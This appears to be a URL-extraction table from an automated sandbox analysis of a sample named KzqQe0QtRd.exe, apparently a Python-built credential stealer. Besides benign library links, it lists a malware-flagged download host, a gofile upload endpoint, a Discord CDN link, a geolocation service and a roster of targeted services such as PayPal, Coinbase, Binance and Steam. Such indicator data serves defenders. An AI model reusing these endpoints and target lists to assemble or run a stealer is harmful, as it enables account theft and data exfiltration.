https://tools.ietf.org/html/rfc3610	KzqQe0QtRd.exe, 00000001.00000003.291291027.0000022127FBB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295871177.0000022127E93000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127E92000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291517549.0000022127FBE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274505409.0000022127E8F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275572297.0000022127E92000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	KzqQe0QtRd.exe, 00000001.00000003.217980895.0000022126E29000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217610498.0000022126E29000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crl	KzqQe0QtRd.exe, 00000001.00000003.274781463.0000022128250000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275800863.0000022128230000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274722105.000002212823E000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275123747.0000022128251000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.accv.es	KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274631255.0000022128191000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://superfurrycdn.nl/copy/	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.python.org/3/library/pprint.html	KzqQe0QtRd.exe, 00000001.00000003.222418452.0000022127578000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294818950.0000022127391000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/actions?query=workflow%3A%22tests%22	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296609743.0000022126738000.00000004.00001000.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/get	KzqQe0QtRd.exe, 00000001.00000003.282819422.0000022127E4C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292085021.0000022127372000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gmail.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://paypal.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access	KzqQe0QtRd.exe, 00000001.00000003.280107530.0000022126BD5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277774285.0000022126BC8000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295601281.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279389580.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288409865.0000022126BD5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uber.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://coinbase.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://wwww.certigna.fr/autorites/0m	KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126DB1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217520428.0000022126ED1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218151664.0000022126ED1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218478065.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291819285.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.278923577.0000022126DDE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220317493.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297213465.0000022126DED000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220625598.0000022126DDA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218900511.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://geolocation-db.com/jsonp/z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/	KzqQe0QtRd.exe, 00000001.00000003.291026470.0000022126D51000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/	KzqQe0QtRd.exe, 00000001.00000003.294516751.00000221282E5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274712221.00000221282DB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275269484.0000022128148000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277019974.00000221282E5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://codecov.io/gh/pypa/setuptools	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://roblox.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	KzqQe0QtRd.exe, 00000001.00000003.219642489.0000022127336000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hbo.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.securetrust.com/STCA.crlm	KzqQe0QtRd.exe, 00000001.00000003.295799416.00000221281BB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://binance.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.290631447.0000022127D07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280811119.0000022126E07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279135679.0000022126E04000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126E05000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127CF7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127CF3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://docs.python.org/3/library/multiprocessing.html	KzqQe0QtRd.exe, 00000001.00000003.275835925.0000022126D48000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/re.html	KzqQe0QtRd.exe, 00000001.00000003.294548460.0000022127475000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287906992.0000022126E9C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276727923.000002212746B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286704566.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275709684.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287484083.0000022126EAE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276603902.0000022126E8B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280811119.0000022126E07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288482138.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279135679.0000022126E04000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126E05000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280336661.0000022126E93000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/issues/417#issuecomment-392298401	KzqQe0QtRd.exe, 00000001.00000002.297531973.0000022127030000.00000004.00001000.00020000.00000000.sdmp	false		high
http://github.com/ActiveState/appdirs	KzqQe0QtRd.exe, 00000001.00000002.297603053.0000022127150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://wiki.debian.org/XDGBaseDirectorySpecification#state	KzqQe0QtRd.exe, 00000001.00000003.287950087.0000022126B4A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277890620.0000022126B29000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/STCA.crl	KzqQe0QtRd.exe, 00000001.00000003.295799416.00000221281BB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wwwsearch.sf.net/):	KzqQe0QtRd.exe, 00000001.00000003.275364164.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277253564.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274367842.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl%	KzqQe0QtRd.exe, 00000001.00000003.295799416.00000221281BB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.xrampsecurity.com/XGCA.crlF2	KzqQe0QtRd.exe, 00000001.00000003.275494844.0000022128143000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274631255.0000022128191000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.accv.es/legislacion_c.htm	KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tiktok.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.xrampsecurity.com/XGCA.crl0	KzqQe0QtRd.exe, 00000001.00000003.291069837.0000022127538000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.298430849.0000022127538000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275690006.0000022127535000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugs.python.org/issue44497.	KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.png	KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://origin.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://telegram.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://riotgames.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.cert.fnmt.es/dpcs/	KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288518670.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277230606.0000022127C96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286608073.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279646443.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275885170.0000022127C84000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292764398.0000022127C98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://playstation.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://google.com/mail	KzqQe0QtRd.exe, 00000001.00000003.287339683.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297223461.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292578153.0000022126DAD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/jaraco/jaraco.functools/issues/5	KzqQe0QtRd.exe, 00000001.00000002.298591685.0000022127650000.00000004.00001000.00020000.00000000.sdmp	false		high
https://pornhub.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.accv.es00	KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	KzqQe0QtRd.exe, 00000001.00000003.219642489.0000022127336000.00000004.00000020.00020000.00000000.sdmp	false		high
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf	KzqQe0QtRd.exe, 00000001.00000003.291291027.0000022127FBB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295871177.0000022127E93000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127E92000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291517549.0000022127FBE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274505409.0000022127E8F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275572297.0000022127E92000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127ED7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127ED3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/installing/	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://google.com/	KzqQe0QtRd.exe, 00000001.00000003.275364164.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292634328.0000022127DD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277993151.0000022127DC8000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279928509.0000022127DCA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277253564.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	KzqQe0QtRd.exe, 00000001.00000002.298114495.0000022127381000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.gofile.io/getServerr	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.m	KzqQe0QtRd.exe	false	URL Reputation: safe	unknown
http://crl.securetrust.com/SGCA.crl	KzqQe0QtRd.exe, 00000001.00000003.295488552.0000022128152000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tools.ietf.org/html/rfc5869	KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/psf/black	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/download/releases/2.3/mro/.	KzqQe0QtRd.exe, 00000001.00000002.296609743.00000221266B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html	KzqQe0QtRd.exe, 00000001.00000003.289970440.00000221280C9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.290968714.0000022127D47000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291291027.0000022127FBB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295871177.0000022127E93000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127E92000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 